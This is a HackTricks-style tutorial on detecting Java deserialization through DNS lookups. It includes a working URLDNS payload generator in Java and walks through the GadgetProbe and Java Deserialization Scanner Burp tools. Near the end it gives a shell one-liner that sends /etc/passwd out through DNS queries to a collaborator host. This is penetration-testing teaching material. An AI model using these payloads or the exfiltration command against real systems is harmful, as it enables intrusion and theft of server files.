11 KiB
Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
DNS request on deserialization
The class java.net.URL
implements Serializable
, this means that this class can be serialized.
public final class URL implements java.io.Serializable {
This class have a curious behaviour. From the documentation: “Two hosts are considered equivalent if both host names can be resolved into the same IP addresses”.
Then, every-time an URL object calls any of the functions equals
or hashCode
a DNS request to get the IP Address is going to be sent.
Calling the function hashCode
from an URL object is fairly easy, it's enough to insert this object inside a HashMap
that is going to be deserialized. This is because at the end of the readObject
function from HashMap
this code is executed:
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[ ... ]
for (int i = 0; i < mappings; i++) {
[ ... ]
putVal(hash(key), key, value, false, false);
}
It is going the execute putVal
with every value inside the HashMap
. But, more relevant is the call to hash
with every value. This is the code of the hash
function:
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
As you can observe, when deserializing a HashMap
the function hash
is going to be executed with every object and during the hash
execution it's going to be executed .hashCode()
of the object. Therefore, if you deserializes a HashMap
containing a URL object, the URL object will execute .hashCode()
.
Now, lets take a look to the code of URLObject.hashCode()
:
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;
hashCode = handler.hashCode(this);
return hashCode;
As you can see, when a URLObject
executes.hashCode()
it is called hashCode(this)
. A continuation you can see the code of this function:
protected int hashCode(URL u) {
int h = 0;
// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();
// Generate the host part.
InetAddress addr = getHostAddress(u);
[ ... ]
You can see that a getHostAddress
is executed to the domain, launching a DNS query.
Therefore, this class can be abused in order to launch a DNS query to demonstrate that deserialization is possible, or even to exfiltrate information (you can append as subdomain the output of a command execution).
URLDNS payload code example
You can find the URDNS payload code from ysoserial here. However, just for make it easier to understand how to code it I created my own PoC (based on the one from ysoserial):
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;
public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}
public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);
//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}
class SilentURLStreamHandler extends URLStreamHandler {
protected URLConnection openConnection(URL u) throws IOException {
return null;
}
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
More information
- https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/
- In the original idea thee commons collections payload was changed to perform a DNS query, this was less reliable that the proposed method, but this is the post: https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/
GadgetProbe
You can download GadgetProbe from the Burp Suite App Store (Extender).
GadgetProbe will try to figure out if some Java classes exist on the Java class of the server so you can know if it's vulnerable to some known exploit.
How does it work
GadgetProbe will use the same DNS payload of the previous section but before running the DNS query it will try to deserialize an arbitrary class. If the arbitrary class exists, the DNS query will be sent and GadgProbe will note that this class exist. If the DNS request is never sent, this means that the arbitrary class wasn't deserialized successfully so either it's not present or it''s not serializable/exploitable.
Inside the github, GadgetProbe has some wordlists with Java classes for being tested.
More Information
Java Deserialization Scanner
This scanner can be download from the Burp App Store (Extender).
The extension has passive and active capabilities.
Passive
By default it checks passively all the requests and responses sent looking for Java serialized magic bytes and will present a vulnerability warning if any is found:
Active
Manual Testing
You can select a request, right click and Send request to DS - Manual Testing
.
Then, inside the Deserialization Scanner Tab --> Manual testing tab you can select the insertion point. And launch the testing (Select the appropriate attack depending on the encoding used).
Even if this is called "Manual testing", it's pretty automated. It will automatically check if the deserialization is vulnerable to any ysoserial payload checking the libraries present on the web server and will highlight the ones vulnerable. In order to check for vulnerable libraries you can select to launch Javas Sleeps, sleeps via CPU consumption, or using DNS as it has previously being mentioned.
Exploiting
Once you have identified a vulnerable library you can send the request to the Exploiting Tab.
I this tab you have to select the injection point again, an write the vulnerable library you want to create a payload for, and the command. Then, just press the appropriate Attack button.
Java Deserialization DNS Exfil information
Make your payload execute something like the following:
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
More Information
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.